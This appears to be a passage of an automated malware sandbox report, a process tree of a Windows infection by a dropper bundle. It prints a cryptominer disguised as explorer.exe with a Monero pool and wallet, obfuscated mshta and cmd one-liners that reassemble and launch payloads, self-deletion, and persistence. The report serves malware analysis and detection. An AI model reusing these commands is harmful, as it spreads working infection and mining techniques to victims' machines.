C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵PID:2836
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2072 -
C:\Users\Admin\AppData\Roaming\1934523.exe"C:\Users\Admin\AppData\Roaming\1934523.exe"8⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
C:\Users\Admin\AppData\Roaming\2625014.exe"C:\Users\Admin\AppData\Roaming\2625014.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Users\Admin\AppData\Roaming\2734892.exe"C:\Users\Admin\AppData\Roaming\2734892.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2616
-
-
C:\Users\Admin\AppData\Roaming\898869.exe"C:\Users\Admin\AppData\Roaming\898869.exe"8⤵
- Executes dropped EXE
PID:2244 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscript:cLosE(CreAteoBject ( "WscRipT.SheLL"). RuN ( "CmD /q /r COpy /y ""C:\Users\Admin\AppData\Roaming\898869.exe"" ..\O0rNF.EXE &&StarT ..\O0rNF.Exe /P2shWm1kbqdY & If """"== """" for %a In ( ""C:\Users\Admin\AppData\Roaming\898869.exe"" ) do taskkill /iM ""%~Nxa"" -f " , 0, TRue) )9⤵PID:2204
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r COpy /y "C:\Users\Admin\AppData\Roaming\898869.exe" ..\O0rNF.EXE&&StarT ..\O0rNF.Exe /P2shWm1kbqdY &If ""== "" for %a In ( "C:\Users\Admin\AppData\Roaming\898869.exe" ) do taskkill /iM "%~Nxa" -f10⤵PID:2632
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "898869.exe" -f11⤵
- Kills process with taskkill
PID:2520
-
-
C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE..\O0rNF.Exe /P2shWm1kbqdY11⤵
- Executes dropped EXE
PID:2972 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscript:cLosE(CreAteoBject ( "WscRipT.SheLL"). RuN ( "CmD /q /r COpy /y ""C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE"" ..\O0rNF.EXE &&StarT ..\O0rNF.Exe /P2shWm1kbqdY & If ""/P2shWm1kbqdY ""== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE"" ) do taskkill /iM ""%~Nxa"" -f " , 0, TRue) )12⤵
- Modifies Internet Explorer settings
PID:2296 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r COpy /y "C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE" ..\O0rNF.EXE&&StarT ..\O0rNF.Exe /P2shWm1kbqdY &If "/P2shWm1kbqdY "== "" for %a In ( "C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE" ) do taskkill /iM "%~Nxa" -f13⤵PID:2780
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIpt: CloSe ( creATEObjecT( "wsCRIpT.sHell" ). RUN ( "Cmd /C Echo | set /p = ""MZ"" > q7PV.R & Copy /y /b Q7PV.R + 21_qTAy.5T + Z8D16.1 ..\MGLZR6G.SL1 & sTArt control ..\MgLZR6G.SL1 &Del /q * " , 0, TRuE) )12⤵
- Modifies Internet Explorer settings
PID:2772 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C Echo | set /p = "MZ" > q7PV.R & Copy /y /b Q7PV.R + 21_qTAy.5T+Z8D16.1 ..\MGLZR6G.SL1 & sTArt control ..\MgLZR6G.SL1 &Del /q *13⤵PID:2488
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>q7PV.R"14⤵PID:2428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "14⤵PID:2224
-
-
C:\Windows\SysWOW64\control.execontrol ..\MgLZR6G.SL114⤵PID:112
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\MgLZR6G.SL115⤵PID:2584
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\MgLZR6G.SL116⤵PID:3044
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\MgLZR6G.SL117⤵PID:2556
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\85209.exe"C:\Users\Admin\AppData\Roaming\85209.exe"8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1648 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵
- Executes dropped EXE
PID:1288
-
-
-
C:\Users\Admin\AppData\Roaming\5319657.exe"C:\Users\Admin\AppData\Roaming\5319657.exe"8⤵
- Executes dropped EXE
PID:2144
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
PID:2096
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"7⤵
- Executes dropped EXE
PID:2432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 8368⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵PID:2460
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
PID:2652
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
PID:2792 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:2728
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:2240
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Executes dropped EXE
PID:940 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:1312
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:2564
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:1696
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:2888
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:1532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:2096
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵PID:2264
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:2256 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2456
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
PID:2868
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2864 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2864 -s 14728⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2700
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe4⤵
- Loads dropped DLL
PID:1772 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03f5d51697d04.exeSun03f5d51697d04.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\is-B6MGD.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-B6MGD.tmp\Sun03f5d51697d04.tmp" /SL5="$10176,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03f5d51697d04.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:980 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03f5d51697d04.exe"C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03f5d51697d04.exe" /SILENT7⤵
- Executes dropped EXE
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\is-AU219.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-AU219.tmp\Sun03f5d51697d04.tmp" /SL5="$20176,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun03f5d51697d04.exe" /SILENT8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2064 -
C:\Users\Admin\AppData\Local\Temp\is-60RG7.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-60RG7.tmp\postback.exe" ss19⤵PID:2232
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe4⤵
- Loads dropped DLL
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\7zSC24BF256\Sun0328255c4bce6fb.exeSun0328255c4bce6fb.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 660 -s 4764⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "481220395685202616-2128667947-288511073-9823294101613225201225419055-1398953068"1⤵
- Executes dropped EXE
PID:2232
-
C:\Windows\system32\taskeng.exetaskeng.exe {813F9533-E550-403A-A512-D5E19B4A1D98} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1016
-
C:\Windows\system32\taskeng.exetaskeng.exe {830E5B0C-B04F-4BC3-8343-5EC7D8B142B0} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2808
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:1220
-
-
C:\Users\Admin\AppData\Roaming\cttesevC:\Users\Admin\AppData\Roaming\cttesev2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3060
-
-
C:\Users\Admin\AppData\Roaming\cttesevC:\Users\Admin\AppData\Roaming\cttesev2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3044
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B24E2757-2228-48DB-9AF9-CA1099280BCB} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1840
-
C:\Windows\system32\taskeng.exetaskeng.exe {39451080-A604-4F80-943C-D931C5BE7F39} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2940
-
C:\Windows\system32\taskeng.exetaskeng.exe {44E46EC1-6E30-471B-8952-22AE73FE413A} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2980
-
C:\Users\Admin\AppData\Roaming\cttesevC:\Users\Admin\AppData\Roaming\cttesev2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1392
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A8A6ED1A-5BAF-490A-B91F-5A20C49F5D24} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1852
-
C:\Users\Admin\AppData\Roaming\cttesevC:\Users\Admin\AppData\Roaming\cttesev2⤵
- Executes dropped EXE
PID:1180
-